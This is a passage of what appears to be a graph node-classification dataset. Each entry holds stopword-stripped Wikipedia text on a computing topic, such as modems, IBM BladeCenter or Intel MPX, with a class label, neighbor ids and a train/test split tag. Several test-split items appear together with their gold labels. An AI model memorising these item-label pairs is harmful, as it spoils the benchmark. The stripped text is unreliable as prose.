logins moved session 0 session 1 thus separating user processes system services could vulnerable creates backward compatibility issues however software designed assumption service running session logged-in user support view windows vista windows server 2008 introduced windows service called interactive services detection enables access dialogs created interactive services appear interactive user shown dialog box offered ability switch session 0 access dialog box capability removed windows 10 creators update",
    "neighbors": [
      3852,
      6028,
      6797,
      7717,
      7983,
      3250,
      3704,
      10828,
      8015,
      10835,
      5465,
      93,
      1501,
      5087,
      2147,
      1254,
      2027,
      8299,
      8045,
      6520,
      10110
    ],
    "mask": "None"
  },
  {
    "node_id": 1114,
    "label": 4,
    "text": "David_A._Wagner:david a. wagner david a. wagner born 1974 professor computer science university california berkeley well-known researcher cryptography computer security member election assistance commission technical guidelines development committee tasked assisting eac drafting voluntary voting system guidelines also member accurate project wagner received a.b mathematics princeton university 1995 m.s computer science berkeley 1999 ph.d. computer science berkeley 2000 published two books 90 peer-reviewed scientific papers notable achievements include",
    "neighbors": [
      4320,
      10146,
      1315,
      7556,
      2567,
      618,
      1847,
      6863,
      3984,
      11505,
      1683,
      1173,
      1941,
      1783,
      9214,
      10329,
      7643,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1115,
    "label": 3,
    "text": "IBM_BladeCenter:ibm bladecenter ibm bladecenter ibm blade server architecture replaced flex system x86 division later sold lenovo 2014 introduced 2002 based engineering work started 1999 ibm bladecenter relatively late blade server market differed prior offerings offered range x86 intel server processors input/output i/o options february 2006 ibm introduced bladecenter h switch capabilities 10 gigabit ethernet infiniband 4x web site called blade.org available blade computing community 2009 2012 replacement flex system introduced original ibm bladecenter later marketed bladecenter e 14 blade slots 7u power supplies upgraded life chassis original 1200 1400 1800 2000 2320 watt bladecenter e co-developed ibm intel included bladecenter telecommunications company version original ibm bladecenter available either ac dc 48 v power 8 blade slots 8u uses switches blades regular bladecenter e. keep nebs level 3 etsi compliant special network equipment-building system nebs compliant blades available upgraded bladecenter design high-speed fabric options fits 14 blades 9u backwards compatible older bladecenter switches blades bladecenter ht telecommunications company version ibm bladecenter h available either ac dc 48 v power 12 blade slots 12u uses switches blades regular bladecenter h. keep nebs level 3 etsi compliant special nebs compliant blades available targets mid-sized customers offering storage inside bladecenter chassis separate external storage needs purchased also use 110 v power north american market used outside datacenter running 120v total chassis capacity reduced modules based x86 processors intel 2008 features 2002-6 features blade model use high-speed io option bladecenter h backwards compatible regular bladecenter features blade model use high-speed io option bladecenter h backwards compatible regular bladecenter features features features similar hs22 features features features blade model targeted workstation market features blade model targeted server virtualization market features modules based x86 processors amd features blade model use high-speed i/o bladecenter h also backwards compatible regular bladecenter features upgraded model ls21 features blade model use high-speed io option bladecenter h backwards compatible regular bladecenter features upgraded model ls41 features modules based powerpc- power isa-based processors ibm features blade model high-speed io option bladecenter h backwards compatible regular bladecenter features features features features features features features similar ps700 think two ps701 tied together back-to-back forming double-wide blade features similar ps701 think two ps703 tied together back-to-back forming double-wide blade modules based cell processors ibm features features features themis computer announced blade around 2008 ran sun solaris operating system sun microsystems module one ultrasparc t2 64 threads 1.2 ghz 32 gb ddr2 sdram processor memory developed conjunction cloudshield features ibm roadrunner supercomputer used custom module called triblade 2008 2013 expansion blade connects two qs22 modules 8 gb ram via four pcie x8 links ls21 module 16 gb ram two links qs22 also provides outside connectivity via infiniband 4x ddr adapter makes total width four slots single triblade three triblades fit one bladecenter h chassis bladecenter total four switch modules two switch module bays take ethernet switch ethernet pass-though use switch module bays daughtercard needs installed blade needs provide required san ethernet infiniband myrinet function mixing different type daughtercards bladecenter chassis allowed gigabit ethernet switch modules produced ibm nortel cisco systems blade network technologies produced switches later purchased ibm cases speed internal bladecenter blades non-blocking external gigabit ethernet ports vary four six either copper optical fiber variety san switch modules produced qlogic cisco mcdata acquired brocade brocade ranging speeds 1 2 4 8 gbit fibre channel speed san switch blade determined lowest-common-denominator blade hba daughtercard san switch external port counts vary two six depending switch module infiniband switch module produced cisco speed blade infiniband daughtercard switch limited ib 1x 2.5 gbit externally switch one ib 4x one ib 12x port ib 12x port split three ib 4x ports giving total four ib 4x ports total theoretical external bandwidth 40 gbit two kinds pass-through module available copper pass-through fibre pass-through copper pass-through used ethernet fibre pass-through used ethernet san myrinet bridge modules compatible bladecenter h bladecenter ht function like ethernet san switches bridge traffic infiniband advantage operating system blade everything seems normal regular ethernet san connectivity inside bladecenter everything gets routed infiniband high-speed switch modules compatible bladecenter h bladecenter ht blade needs function must high-speed daughtercard installed different high-speed daughtercards mixed bladecenter chassis 10 gigabit ethernet switch module available blade network technologies allowed 10 gbit/s connection blade outside bladecenter several infiniband options",
    "neighbors": [
      9472,
      9090,
      643,
      5767,
      3472,
      5273,
      6311,
      10543,
      4017,
      306,
      6834,
      8625,
      10417,
      823,
      6072,
      7863,
      2877,
      1985,
      9665,
      1480,
      5322,
      3025,
      6738,
      2394,
      1115,
      859,
      3677,
      9445,
      10985,
      4587,
      499,
      6004,
      1784,
      3323,
      8700,
      6909
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1116,
    "label": 9,
    "text": "Translational_Backus–Naur_form:translational backus–naur form translational backus–naur form tbnf translational bnf refers backus–naur form formal grammar notation used define syntax computer languages algol ada c++ cobol fortran java perl python many others tbnf goes beyond bnf extended bnf ebnf grammar notation defines syntax language also defines structure abstract syntax tree ast created memory output intermediate code generated thus tbnf defines complete translation process input source code intermediate code specification output intermediate code optional case still get automatic ast creation ability define structure grammar tbnf concept first published april 2006 paper sigplan notices special interest group acm sample grammar specified tbnf given input running translator generated grammar would produce output",
    "neighbors": [
      10560,
      1956,
      4293,
      8582,
      428,
      3960
    ],
    "mask": "Test"
  },
  {
    "node_id": 1117,
    "label": 3,
    "text": "Mooers's_law:mooers law mooers law empirical observation behavior made american computer scientist calvin mooers 1959 observation made relation information retrieval interpretation observation used commonly throughout information profession within outside original context mooers argued information risk languishing unused due effort required assimilate also fallout could arise discovery information conflicts user personal academic corporate interests interacting new information user runs risk proving work incorrect even irrelevant instead mooers argued users prefer remain state safety new arguments ignored attempt save potential embarrassment reprisal supervisors commonly used interpretation mooers law considered derivation principle least effort first stated george kingsley zipf interpretation focuses amount effort expended use understand particular information retrieval system information seeker gives law often paraphrased increase focus retrieval system interpretation painful troublesome comes using retrieval system",
    "neighbors": [
      2273
    ],
    "mask": "None"
  },
  {
    "node_id": 1118,
    "label": 6,
    "text": "File_virtualization:file virtualization computing file virtualization field storage virtualization operating computer file level involves uniting multiple storage devices single logical pool file vital part file area network fan network file management nfm concepts virtualization designs primary driver behind file virtualization desire shield users administrators complexity underlying storage environment goals include simplified management efficient capacity usage allocation reduced management costs network file management nfm data storage management-related category identified defined 2004 several prominent data storage analysts term used interchangeably nas virtualization file virtualization among data storage industry press analysts system administrators basic idea nfm rapid ongoing growth file data capacity enterprise networks led massive management complexity accelerating operating costs nfm concept creating virtualization layer clients file servers nas devices creating abstraction layer system administrators may simplify management multiple storage devices including non-disruptive movement data servers preserving client access path pathname policies automating placement data according changing needs ability discover analyze report server file usage",
    "neighbors": [
      2432,
      5178,
      3909,
      9844,
      9625,
      8410
    ],
    "mask": "Test"
  },
  {
    "node_id": 1119,
    "label": 3,
    "text": "Tiger_Lake_(microarchitecture):tiger lake microarchitecture tiger lake intel cpu microarchitecture based second-generation 10nm process node named 10nm+ replace ice lake tiger lake slated include quad-core 9 w tdp 25 w tdp models power 2020 project athena laptops",
    "neighbors": [
      3459,
      5380,
      2821,
      3973,
      8325,
      9095,
      5386,
      9611,
      4108,
      9741,
      398,
      5649,
      7313,
      5523,
      6804,
      8851,
      4886,
      9111,
      3352,
      9500,
      5883,
      2088,
      10669,
      9391,
      10675,
      4276,
      1461,
      10548,
      2237,
      5309,
      8125,
      8126,
      833,
      6339,
      5444,
      9541,
      1998,
      2638,
      977,
      2514,
      5073,
      5844,
      8795,
      7134,
      1000,
      7657,
      4204,
      5356,
      8684,
      5871,
      9582,
      499,
      8820,
      3317,
      4217,
      4603,
      5503
    ],
    "mask": "Test"
  },
  {
    "node_id": 1120,
    "label": 3,
    "text": "Nobunaga's_Ambition_(video_game):nobunaga ambition video game player may choose four campaign scenarios including battle east beginning 1560 daimyo power struggles 1560 ambition untamed 1571 road towards unification 1582 scenario player must allocate resources raise capable military force provide productive economy support military civilian expansion support peasants order sustain respect loyalty gameplay taken turns turn map view corresponding season turn battle corresponding day player may achieve victory numerous means among forcing enemy retreat destroying enemy command unit outlasting invading force prolonging battles opposing force exhausted supplies player make many choices campaign according evan brooks computer gaming world one may transfer soldiers fiefs go war increase taxes causes decrease peasant loyalty may lead rebellion transfer rice gold another fief raise level flood control decreases productivity make non-aggression pact arrange marriage cultivate increases productivity decreases peasant loyalty use merchant buy/sell rice borrow funds purchase weapons recruit military soldiers ninja train army increases fighting efficiency spy rival expand town increases taxes collected decreases peasant loyalty give food/rice peasants/soldiers raise morale steal peasants rival daimyos allocate military strength recuperate even daimyo get sick turn controlled fief computer administration pass turn hint one idea train troops north america game positively reviewed computer gaming world reviewer evan brooks gave four stars five introduced game detailed economic diplomatic political military simulation unification japan sixteenth century praised graphics among best reviewer ever seen ibm 5x10 hex map battles noted used role-playing game elements including assigning various statistics selected persona time system turn represents year daimyo ages eventually dies old age multiplayer option stated thoroughly enjoyed nobunaga ambition concluded highly recommended rating compute similarly praised ibm pc version calling one best strategic war games ever designed personal computer citing game play user interface documentation console versions lukewarm reception reviewing snes version gamepro praised control interface combat system opined game essentially offers nothing set apart koei previous historical simulators rated genesis version similarly saying like koei games nobunaga easy-to-use detailed menu-driven interface activates load complex commands",
    "neighbors": [
      4706,
      10316,
      9006,
      10999
    ],
    "mask": "Test"
  },
  {
    "node_id": 1121,
    "label": 5,
    "text": "Modem:modem modem portmanteau modulator-demodulator hardware device converts data format suitable transmission medium transmitted computer computer historically telephone wires modem modulates one carrier wave signals encode digital information transmission demodulates signals decode transmitted information goal produce signal transmitted easily decoded reliably reproduce original digital data modems used almost means transmitting analog signals light-emitting diodes radio common type modem one turns digital data computer modulated electrical signal transmission telephone lines demodulated another modem receiver side recover digital data modems generally classified maximum amount data send given unit time usually expressed bits per second symbol bit sometimes abbreviated bps rarely bytes per second symbol b modems also classified symbol rate measured baud baud unit denotes symbols per second number times per second modem sends new signal example itu v.21 standard used audio frequency-shift keying two possible frequencies corresponding two distinct symbols one bit per symbol carry 300 bits per second using 300 baud contrast original itu v.22 standard could transmit receive four distinct symbols two bits per symbol transmitted 1,200 bits sending 600 symbols per second 600 baud using phase-shift keying news wire services 1920s used multiplex devices satisfied definition modem however modem function incidental multiplexing function commonly included history modems modems grew need connect teleprinters ordinary phone lines instead expensive leased lines previously used current loop–based teleprinters automated telegraphs 1941 allies developed voice encryption system called sigsaly used vocoder digitize speech encrypted speech one-time pad encoded digital data tones using frequency shift keying mass-produced modems united states began part sage air-defense system 1958 year word modem first used connecting terminals various airbases radar sites command-and-control centers sage director centers scattered around united states canada sage modems described bell labs conforming newly published bell 101 dataset standard ran dedicated telephone lines devices end different commercial acoustically coupled bell 101 110 baud modems 201a 201b data-phones synchronous modems using two-bit-per-baud phase-shift keying psk 201a operated half-duplex 2,000 bit/s normal phone lines 201b provided full duplex 2,400 bit/s service four-wire leased lines send receive channels running set two wires famous bell 103a dataset standard also introduced 1962 provided full-duplex service 300 bit/s normal phone lines frequency-shift keying used call originator transmitting 1,070 1,270 hz answering modem transmitting 2,025 2,225 hz readily available 103a2 gave important boost use remote low-speed terminals teletype model 33 asr ksr ibm 2741 reduced modem costs introducing originate-only 113d answer-only 113b/c modems many years bell system maintained monopoly use phone lines devices could connected however fcc seminal carterfone decision 1968 fcc concluded electronic devices could connected telephone system long used acoustic coupler since handsets supplied western electric thus standard design acoustic couplers relatively easy build acoustically coupled bell 103a-compatible 300 bit/s modems common 1970s well-known models included novation cat anderson-jacobson latter spun in-house project stanford research institute sri international even lower-cost option pennywhistle modem designed built using parts electronics scrap surplus stores december 1972 vadic introduced va3400 notable full-duplex operation 1,200 bit/s phone network like 103a used different frequency bands transmit receive november 1976 introduced 212a modem compete vadic similar design used lower frequency set transmission one could also use 212a 103a modem 300 bit/s according vadic change frequency assignments made 212 intentionally incompatible acoustic coupling thereby locking many potential modem manufacturers 1977 vadic responded va3467 triple modem answer-only modem sold computer center operators supported vadic 1,200-bit/s mode 212a mode 103a operation hush-a-phone decision applied mechanical connections carterfone decision 1968 led fcc introducing rule setting stringent t-designed tests electronically coupling device phone lines opened door direct-connect modems plugged directly phone line rather via handset however cost passing tests considerable acoustically coupled modems remained common early 1980s rapidly falling prices electronics late 1970s led increasing number direct-connect models around 1980 spite directly connected modems generally operated like earlier acoustic versions – dialing phone-control operations completed hand using attached handset small number modems added ability automatically answer incoming calls automatically place outgoing call single number even limited features relatively rare limited special models lineup flexible solutions needed third party dialers used automate calling normally using separate serial port communicate dialer would control modem private electrical connection introduction microcomputer systems internal expansion slots made first software-controllable modems common slot connections gave computer complete access modem memory input/output i/o channels allowed software send commands modem data led series popular modems s-100 bus apple ii computers could directly dial phone answer incoming calls hang phone basic requirements bulletin board system bbs seminal cbbs created s-100 machine hayes internal modem number similar systems followed next major advance modems hayes smartmodem introduced 1981 smartmodem otherwise standard 103a 300 bit/s direct-connect modem attached small microcontroller watched data stream certain character strings representing commands allowed data commands sent single serial port now-standard hayes command set included instructions picking hanging phone dialing numbers answering calls among others similar commands offered internal modems unlike smartmodem could connected computer rs-232 port practically every microcomputer built introduction smartmodem made communications much simpler easily accessed provided growing market vendors licensed hayes patents competed price adding features 1980s number new higher-speed modems first 1,200 2,400 bit/s greatly improved responsiveness online systems made file transfer practical led rapid growth online services large file libraries turn gave reason modem rapid update modems led similar rapid increase bbs use helped fact bbss could control modem simply sending strings rather talking device driver different every direct-connect modem 300 bit/s modems used audio frequency-shift keying send data system stream 1s 0s computer data translated sounds easily sent phone lines bell 103 system originating modem sends 0s playing 1,070 hz tone 1s 1,270 hz answering modem transmitting 0s 2,025 hz 1s 2,225 hz frequencies chosen carefully range suffers minimum distortion phone system harmonics 1,200 bit/s faster systems phase-shift keying used system two tones one side connection sent similar frequencies 300 bit/s systems slightly phase voiceband modems generally remained 300 1,200 bit/s v.21 v.22 mid-1980s v.22bis 2,400-bit/s system similar concept 1,200-bit/s bell 212 signaling introduced u.s. slightly different one europe limited available frequency range meant symbol rate 1,200 bit/s modems still 600 baud symbols per second bit rate increases achieved defining four eight distinct symbols allowed encoding two three bits per symbol instead 1 use smaller shifts drawback making symbol vulnerable interference improvements phone line quality time helped compensate late 1980s modems could support standards 2,400-bit/s operation becoming common many standards also introduced special purposes commonly using high-speed channel receiving lower-speed channel sending one typical example used french minitel system user terminals spent majority time receiving information modem minitel terminal thus operated 1,200 bit/s reception 75 bit/s sending commands back servers three u.s. companies became famous high-speed versions concept telebit introduced trailblazer modem 1984 used large number 36 bit/s channels send data one-way rates 18,432 bit/s single additional channel reverse direction allowed two modems communicate much data waiting either end link modems could change direction fly trailblazer modems also supported feature allowed spoof uucp g protocol commonly used unix systems send e-mail thereby speed uucp tremendous amount trailblazers thus became extremely common unix systems maintained dominance market well 1990s usrobotics usr introduced similar system known hst although supplied 9,600 bit/s early versions least provided larger backchannel rather offer spoofing usr instead created large market among fidonet users offering modems bbs sysops much lower price resulting sales end users wanted faster file transfers hayes forced compete introduced 9,600 bit/s standard express 96 also known ping-pong generally similar telebit pep hayes however offered neither protocol spoofing sysop discounts high-speed modems remained rare common feature high-speed modems concept fallback speed hunting allowing communicate less-capable modems call initiation modem would transmit series signals wait remote modem respond would start high speeds get progressively slower response thus two usr modems would able connect 9,600 bit/s user 2,400 bit/s modem called usr would fall back common 2,400 bit/s speed would also happen v.32 modem hst modem connected used different standard 9,600 bit/s would fall back highest commonly supported standard 2,400 bit/s applies v.32bis 14,400 bit/s hst modem would still able communicate 2,400 bit/s echo cancellation next major advance modem design local telephone lines use wires send receive data results small amount outgoing signal reflected back useful people talking phone provides signal speaker voice making system however reflected signal causes problems modem unable distinguish signal remote modem echo signal earlier modems split signal frequencies answer originate modem could ignore signals frequency range using transmission even improvements phone system allowing higher speeds splitting available phone signal bandwidth still imposed half-speed limit modems echo cancellation eliminated problem call setup negotiation period modems send series unique tones listen return phone system measure total delay time set local delay loop time connection completed send signals phone lines normal also delay inverted signal returning echo meets inverted version coming delay line cancels echo allowed modems use full spectrum available doubling speed additional improvements introduced via quadrature amplitude modulation qam encoding system previous systems using phase shift keying psk encoded two bits sometimes three per symbol slightly delaying advancing signal phase relative set carrier tone qam used combination phase shift amplitude encode four bits per symbol transmitting 1,200 baud produced 4,800 bit/s v.27ter standard working base rate 2,400 baud produced 9,600 bit/s v.32 carrier frequency 1,650 hz systems many years engineers considered rate limit data communications telephone networks introduction higher-speed systems also led digital fax machine 1980s digital faxes simply image format sent high-speed commonly 14.4 kbit/s modem software running host computer convert image fax format sent using modem software one time add-on since become largely universal first 9,600 bit/s modem developed 1968 sold 20,000 high error rates 1980 gottfried ungerboeck ibm zurich research laboratory applied channel coding techniques search new ways increase speed modems results astonishing conveyed colleagues 1982 agreed publish landmark paper theory information coding applying parity check coding bits symbol mapping encoded bits two-dimensional diamond pattern ungerboeck showed possible increase speed factor two error rate new technique called mapping set partitions known trellis modulation error correcting codes encode code words sets bits way far case error still closest original word confused another thought analogous sphere packing packing pennies surface two bit sequences one another easier correct minor errors dave forney introduced trellis diagram landmark 1973 paper popularized viterbi algorithm practically modems operating faster 9600 bit/s decode trellis-modulated data using viterbi algorithm v.32 modems operating 9600 bit/s expensive starting enter market early 1990s v.32bis standardized rockwell international chip division developed new driver chip set incorporating standard aggressively priced supra inc. arranged short-term exclusivity arrangement rockwell developed suprafaxmodem 14400 based introduced january 1992 399 less half price slower v.32 modems already market led price war end year v.32 dead never really established v.32bis modems widely available 250 v.32bis successful older high-speed standards little recommend usr fought back 16,800 bit/s version hst introduced one-off 19,200 bit/s method referred v.32ter neither non-standard modem sold well interest proprietary improvements destroyed lengthy introduction 28,800 bit/s v.34 standard waiting several companies decided release hardware introduced modems referred v.fast order guarantee compatibility v.34 modems standard ratified 1994 manufacturers forced use flexible parts generally dsp microcontroller opposed purpose-designed asic modem chips itu standard v.34 represents culmination joint efforts employs powerful coding techniques including channel encoding shape encoding mere four bits per symbol 9.6 kbit/s new standards used functional equivalent 6 10 bits per symbol plus increasing baud rates 2,400 3,429 create 14.4 28.8 33.6 kbit/s modems rate near theoretical shannon limit calculated shannon capacity narrowband line formula_1 formula_2 linear signal-to-noise ratio narrowband phone lines bandwidth 3,000 hz using formula_3 snr 30 db capacity approximately 30 kbit/s late 1990s rockwell-lucent usrobotics introduced competing technologies based upon digital transmission used telephony networks standard digital transmission modern networks 64 kbit/s networks use part bandwidth remote office signaling e.g hang phone limiting effective rate 56 kbit/s ds0 new technology adopted itu standards v.90 common modern computers 56 kbit/s rate possible central office user site downlink united states government regulation limits maximum power output resulting maximum data rate 53.3 kbit/s uplink user central office still uses v.34 technology 33.6 kbit/s usrobotics began work technology first calling x2 56k twice speed 28k modems usrobotics held 40-percent share retail modem market rockwell international held 80-percent share modem chipset market concerned shut market rockwell began work rival 56k technology joined lucent motorola called k56flex flex technologies reached market around february 1997 although problems k56flex modems noted product reviews july within six months worked equally well variations dependent local connection characteristics retail price 56k modems us 200 compared 100 33k modems separate equipment required internet service providers isps support incompatible technologies costs varying depending whether current equipment could upgraded half isps offered 56k support october 1997 consumer sales relatively low usrobotics rockwell attributed conflicting standards international telecommunication union itu announced draft new 56 kbit/s standard v.90 february 1998 strong industry support incompatible either existing standard amalgam designed allow types modem converted firmware upgrade v.90 standard approved september 1998 widely adopted isps consumers later v.92 digital pcm technique applied increase upload speed maximum 48 kbit/s expense download rates 48 kbit/s upstream rate would reduce downstream low 40 kbit/s due echo telephone line avoid problem v.92 modems offer option turn digital upstream instead use 33.6 kbit/s analog connection order maintain high digital downstream 50 kbit/s higher v.92 also adds two features first ability users call waiting put dial-up internet connection hold extended periods time answer call second feature ability quickly connect one isp achieved remembering analog digital characteristics telephone line using saved information reconnecting v.42 v.42bis v.44 standards allow modem transmit data faster basic rate would imply instance 53.3 kbit/s connection v.44 transmit 53.3 × 6 320 kbit/s using pure text however compression ratio tends vary due noise line due transfer already-compressed files zip files jpeg images mp3 audio mpeg video points modem sending compressed files approximately 50 kbit/s uncompressed files 160 kbit/s pure text 320 kbit/s value situations small amount memory modem buffer used hold data compressed sent across phone line order prevent overflow buffer sometimes becomes necessary tell computer pause datastream accomplished hardware flow control using extra lines modem–computer connection computer set supply modem higher rate 320 kbit/s modem tell computer start stop sending data telephone-based 56k modems began losing popularity internet service providers netzero/juno netscape others started using pre-compression increase throughput maintain customer base server-side compression operates much efficiently on-the-fly compression done modems compression techniques application-specific jpeg text exe etc. website text images flash executables compacted approximately 4 12 30 respectively drawback approach loss quality causes image content become pixelated smeared isps employing approach often advertise accelerated dial-up accelerated downloads integrated opera amazon silk web browsers using server-side text image compression winmodem softmodem stripped-down modem replaces tasks traditionally handled hardware software case modem simple interface codec code decode digital signal softmodems cheaper traditional modems fewer hardware components however software interpreting modem tones sent softmodem uses system resources online gaming real concern another problem lack cross-platform compatibility meaning non-windows operating systems linux often equivalent driver operate modem values maximum values actual values may slower certain conditions example noisy phone lines complete list see companion article list device bandwidths baud one symbol per second symbol may encode one data bits 1994 software publishers association found although 60 computers us households modem 7 households went online cea study 2006 found dial-up internet access declining u.s 2000 dial-up internet connections accounted 74 u.s. residential internet connections united states demographic pattern dial-up modem users per capita less mirrored canada australia past 20 years dial-up modem use u.s. dropped 60 2003 2006 stood 36 voiceband modems popular means internet access u.s. advent new ways accessing internet traditional 56k modem losing popularity dial-up modem still widely used customers rural areas dsl cable satellite fiber optic service available unwilling pay companies charge 2012 annual report aol showed still collects around us 700 million fees dial-up users three million people adsl asymmetric digital subscriber line modems recent development limited telephone voiceband audio frequencies standard twisted-pair telephone cable short distances carry signals much higher frequencies cable maximum frequency rating adsl broadband takes advantage capability however adsl performance gradually declines telephone cable length increases limits adsl broadband service subscribers within relatively short distance telephone exchange cable modems use infrastructure originally intended carry television signals therefore designed outset carry higher frequencies single cable carry radio television signals time broadband internet service without interference newer types broadband modems also available including satellite modems power line modems consumers know networking routers broadband became available however many people knew modem connected computer internet telephone line take advantage consumers familiarity modems companies called devices broadband modems rather using less familiar terms adapter interface transceiver bridge fact broadband modems fit definition modem use complex waveforms carry digital data use advanced technology dial-up modems typically modulate demodulate hundreds channels simultaneously use much wider channels dial-up modems direct broadcast satellite wifi mobile phones use modems communicate wireless services today modern telecommunications data networks also make extensive use radio modems long distance data links required systems important part pstn also common use high-speed computer network links outlying areas fibre economical even cable installed often possible get better performance make parts system simpler using radio frequencies modulation techniques cable coaxial cable large bandwidth signal attenuation becomes major problem high data rates baseband digital signal used using modem much larger amount digital data transmitted single wire digital cable television cable internet services use radio frequency modems provide increasing bandwidth needs modern households using modem also allows frequency-division multiple access used making full-duplex digital communication many users possible using single wire wireless modems come variety types bandwidths speeds wireless modems often referred transparent smart transmit information modulated onto carrier frequency allow many simultaneous wireless communication links work simultaneously different frequencies transparent modems operate manner similar phone line modem cousins typically half duplex meaning could send receive data time typically transparent modems polled round robin manner collect small amounts data scattered locations easy access wired infrastructure transparent modems commonly used utility companies data collection smart modems come media access controllers inside prevents random data colliding resends data correctly received smart modems typically require bandwidth transparent modems typically achieve higher data rates ieee 802.11 standard defines short range modulation scheme used large scale throughout world wifi wimax standards use wireless mobile broadband modems operating microwave frequencies modems use mobile telephone system gprs umts hspa evdo wimax etc known mobile broadband modems sometimes also called wireless modems wireless modems embedded inside laptop appliance external external wireless modems connect cards usb modems mobile broadband cellular routers connect card pc card expresscard slides pcmcia/pc card/expresscard slot computer usb wireless modems use usb port laptop instead pc card expresscard slot usb modem used mobile broadband internet also sometimes referred dongle cellular router may external datacard aircard slides cellular routers allow datacards usb modems cellular routers may modems definition contain modems allow modems slid difference cellular router wireless modem cellular router normally allows multiple people connect since route data support multi-point multi-point connections modem designed one connection gsm wireless modems come integrated sim cardholder i.e. huawei e220 sierra 881 etc models also provided microsd memory slot and/or jack additional external antenna huawei e1762 sierra wireless compass 885 cdma evdo versions use r-uim cards use electronic serial number esn instead cost using wireless modem varies country country carriers implement flat rate plans unlimited data transfers caps maximum limits amount data transferred per month countries plans charge fixed rate per data transferred—per megabyte even kilobyte data downloaded tends add quickly today content-filled world many people pushing flat data rates faster data rates newest wireless modem technologies umts hspa evdo wimax also considered broadband wireless modems compete broadband modems end april 2011 worldwide shipments usb modems surpassed embedded 3g 4g modules 3:1 usb modems easily discarded embedded modems could start gain popularity tablet sales grow incremental cost modems shrinks 2016 ratio may change 1:1 like mobile phones mobile broadband modems sim locked particular network provider unlocking modem achieved way unlocking phone using 'unlock code devices referred broadband modems residential gateways integrating functions modem network address translation nat router ethernet switch wifi access point dhcp server firewall among others residential gateway offer so-called bridged mode disables built-in routing function makes device function similarly plain modem bridged mode separate rfc 1483 bridging dc-bus powerline modem provide communication noisy power lines speeds 1.3mbit/s using ordinary uart lin spi protocols modems used connect fiber optic network known optical network units onus fiber optic systems upgraded use quadrature amplitude modulation modulator demodulator separate components rather single assembly modems 16qam uses 16-point constellation send four bits per symbol speeds usually order 200 400 gigabits per second 64qam uses 64-point constellation send six bits per symbol although suppliers announced components announcements installation rare speeds 65 terabits per second observed although name modem seldom used case modems also used high-speed home networking applications especially using existing home wiring one example g.hn standard developed itu-t provides high-speed 1 gbit/s local area network using existing home wiring power lines phone lines coaxial cables g.hn devices use orthogonal frequency-division multiplexing ofdm modulate digital signal transmission wire phrase null modem used describe attaching specially wired cable serial ports two personal computers basically transmit output one computer wired receive input true computers software used modems procomm minicom could used null modem connection voice modems regular modems capable recording playing audio telephone line used telephony applications see voice modem command set details voice modems type modem used fxo card private branch exchange pbx systems compare v.92",
    "neighbors": [
      4609,
      2057,
      1038,
      1550,
      7188,
      6165,
      6681,
      5664,
      2598,
      6697,
      7723,
      5681,
      1083,
      7739,
      10303,
      3140,
      4679,
      1098,
      10316,
      5201,
      1618,
      4691,
      1621,
      3168,
      10853,
      7271,
      117,
      119,
      6783,
      639,
      6787,
      10381,
      10894,
      4244,
      8857,
      7325,
      5281,
      1194,
      5809,
      6837,
      5304,
      8898,
      3272,
      3281,
      2261,
      8917,
      9433,
      9947,
      9438,
      6880,
      1761,
      3815,
      7400,
      6378,
      1772,
      8432,
      2802,
      5368,
      780,
      5926,
      9512,
      5936,
      9524,
      823,
      4409,
      7490,
      11075,
      10053,
      8521,
      10058,
      9035,
      5455,
      5968,
      2389,
      3939,
      5475,
      7527,
      2920,
      361,
      6001,
      5492,
      10104,
      4993,
      6529,
      8578,
      8584,
      2458,
      3483,
      5020,
      11165,
      11170,
      11686,
      7591,
      1969,
      2994,
      8625,
      10674,
      8632,
      11196,
      4543,
      5572,
      7108,
      1478,
      3024,
      2525,
      3040,
      8160,
      488,
      10728,
      4590,
      5118
    ],
    "mask": "Test"
  },
  {
    "node_id": 1122,
    "label": 3,
    "text": "Intel_MPX:intel mpx intel mpx memory protection extensions set extensions x86 instruction set architecture compiler runtime library operating system support intel mpx brings increased security software checking pointer references whose normal compile-time intentions maliciously exploited runtime due buffer overflows intel mpx introduces new bounds registers new instruction set extensions operate registers additionally new set bound tables store bounds beyond fit bounds registers mpx uses four new 128-bit bounds registers codice_1 codice_2 storing pair 64-bit lower bound lb upper bound ub values buffer upper bound stored ones complement form codice_3 create bounds codice_4 check upper bound performing conversion architecture includes two configuration registers codice_5 codice_6 user space codice_7 kernel mode status register codice_8 provides memory address error code case exception two-level address translation used storing bounds memory top layer consists bounds directory bd created application startup bd entry either empty contains pointer dynamically created bounds table bt turn contains set pointer bounds along linear addresses pointers bounds load codice_9 store codice_10 instructions transparently perform address translation access bounds proper bt entry intel mpx introduced part skylake microarchitecture intel goldmont microarchitecture also supports intel mpx study examined detailed cross-layer dissection mpx system stack comparison three prominent software-based memory safety systems addresssanitizer safecode softbound presents following conclusions addition review concluded mpx production ready addresssanitizer better option review kostya serebryany google addresssanitizer developer similar findings another study exploring scope spectre meltdown security vulnerabilities discovered meltdown used bypass intel mpx using bound range exceeded br hardware exception according publication searchers able leak information flush+reload covert channel out-of-bound access array safeguarded mpx system proof concept publicly disclosed",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      5154,
      6181,
      8231,
      2088,
      3630,
      6705,
      7218,
      1085,
      2623,
      2113,
      7234,
      3142,
      2638,
      8795,
      2655,
      3175,
      7783,
      8815,
      6268,
      3197,
      4237,
      7313,
      9369,
      6815,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      10933,
      9911,
      8890,
      5309,
      4286,
      9932,
      5326,
      5329,
      5844,
      9428,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      5363,
      2805,
      9976,
      249,
      2821,
      1798,
      1801,
      6924,
      6926,
      6415,
      11539,
      9500,
      2339,
      6950,
      3886,
      7983,
      309,
      8501,
      8506,
      5948,
      833,
      8514,
      9541,
      4423,
      7505,
      9044,
      344,
      1376,
      10603,
      9582,
      4465,
      10612,
      1399,
      7033,
      1402,
      10620,
      3457,
      4491,
      3470,
      5518,
      6038,
      407,
      409,
      1952,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      8120,
      8125,
      4030,
      8126,
      1474,
      453,
      977,
      466,
      2514,
      1499,
      7134,
      5090,
      995,
      7653,
      1000,
      8684,
      10734,
      6639,
      499,
      4596,
      10746,
      4603,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 1123,
    "label": 2,
